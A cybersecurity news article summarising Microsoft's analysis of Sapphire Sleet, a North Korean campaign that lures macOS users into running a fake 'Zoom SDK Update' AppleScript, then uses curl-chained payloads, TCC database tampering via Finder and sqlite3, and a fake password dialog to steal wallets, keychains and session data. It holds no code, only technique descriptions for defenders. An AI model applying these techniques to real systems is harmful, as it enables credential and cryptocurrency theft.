Beyond Gatekeeper: How Sapphire Sleet’s AppleScript Trap Hijacks macOS and Crypto Wallets
Ddos 
Process tree showing cascading execution from Script Editor | Image: Microsoft Threat Intelligence
In a sophisticated shift away from traditional software exploitation, the North Korean state-sponsored threat actor Sapphire Sleet has been observed targeting the finance and cryptocurrency sectors using a multi-stage, macOS-focused social engineering campaign. By persuading users to manually execute malicious files, the actor effectively operates outside of macOS’s built-in security boundaries, including Gatekeeper, notarization checks, and Transparency, Consent, and Control (TCC) protections.
According to a detailed analysis from Microsoft Threat Intelligence, this activity demonstrates how “threat actors continue to rely on user interaction and trusted system utilities to bypass macOS platform security protections, rather than exploiting traditional software vulnerabilities”.
The campaign begins with a well-documented social engineering playbook. Using fake recruiter profiles on professional networking platforms, the actors lure targets into a “technical interview” and direct them to download a file named Zoom SDK Update.scpt.
This file is a compiled AppleScript designed to open in the trusted first-party Script Editor app. To maintain the illusion of a legitimate update, the script includes a large decoy comment block and inserts thousands of blank lines to hide its malicious logic from view. It even launches a legitimate softwareupdate command with invalid parameters to reinforce its disguise.
Once executed, the initial script triggers a “cascading chain of curl commands”. This multi-stage process dynamically fetches and executes increasingly complex AppleScript payloads, using different user-agent strings (such as mac-cur1 through mac-cur5) as campaign tracking identifiers.The primary components of the attack include:
- com.apple.cli: A host monitoring binary that performs real-time reconnaissance of running processes and hardware details.
- services: The primary backdoor and persistence installer, which establishes a launch daemon to ensure the malware survives system reboots.
- systemupdate.app: A malicious application that presents a visually indistinguishable macOS password dialog to steal the user’s login credentials.
One of the most remarkable aspects of Sapphire Sleet’s campaign is the silent manipulation of the TCC (Transparency, Consent, and Control) database. To access sensitive data without triggering user prompts, the malware directs Finder—which has Full Disk Access by default—to rename the protected TCC folder.
Once the database is exposed, the actor uses sqlite3 to inject new permissions. As the report highlights, “Sapphire Sleet achieves a highly reliable infection chain that lowers operational friction and increases the likelihood of successful compromise”.
After securing persistence and bypassing system protections, the actor deploys a 575-line AppleScript to systematically harvest seven categories of sensitive data. Every upload is executed using nohup, ensuring that the exfiltration continues even if the user closes their session.
- Cryptocurrency Wallets: Full application directories for Ledger Live and Exodus, along with browser extensions.
- Messaging: Complete Telegram Desktop session data, allowing the actor to recreate sessions on other systems without reauthentication.
- System Credentials: The user’s sign-in keychain and browser-saved passwords.
- Operational History: SSH keys and shell history to enable potential lateral movement within an organization.
- Personal Data: Apple Notes databases, which often contain sensitive meeting notes or infrastructure details.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
